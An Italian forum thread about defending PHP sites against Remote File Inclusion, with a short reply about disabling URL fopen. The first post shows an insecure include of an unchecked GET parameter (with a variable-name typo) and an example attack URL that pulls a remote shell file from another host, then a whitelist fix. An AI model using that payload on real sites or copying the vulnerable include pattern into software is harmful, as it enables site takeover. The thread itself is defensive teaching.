Difendersi dalle RFI

« Older   Newer »
 
  Share  
.
  1. • God121
    view post Posted on 6/5/2012, 15:34
     
    .

    User deleted
    L'RFI ovvero il Remote File Inclusion serve, come dice il nome, ad includere un file da un nostro spazio hosting in un sito vittima.

    Ovviamente i file non possono essere inclusi ovunque, infatti questo meccanismo sfrutta le debolezze umane:

    Si puo includere infatti solo se il programmatore usa variabili non controllate per includere i file

    ecco un esempio:

    sito debole:
    CODICE
    http://overden.hellospace.net/pagina.php?include=ricerca.php


    Codice php debole:
    CODICE
    $include=$_GET['include'];
    include($includi);

    In questo modo la pagina.php includerà ricerca.php ma se noi mettessimo nell'url:
    CODICE
    http://overden.hellospace.net/pagina.php?include=http://overden2.hellospace.net/shell.txt

    In questo modo includeremo una shell e l'attaccante prendererà il pieno controllo del sito

    Per evitare ciò possiamo modificare il codice php in questo modo:
    CODICE
    $include=$_GET['include'];
    if($include == "file1.php" ^ $include == "file2.php" ^ $include == "file3.php"){
    include($include);
    }else{
    echo "Pagina non valida!";

    }

    In questo modo se le pagine incluse non saranno file1, file2 o file3.php darà un errore.

    Guida by Overden
     
    Top
    .
  2. meh.
    view post Posted on 6/5/2012, 16:54
     
    .

    User deleted
    Il modo piu' facile e' disabilitare l'url fopen.

    Certo e' che poi rimane la LFI :)
     
    Top
    .
1 replies since 6/5/2012, 15:34   58 views
  Share  
.

PHP
Create your forum and your blog! · Top Forum · Categories · Help · Status · Contacts · Powered by ForumCommunity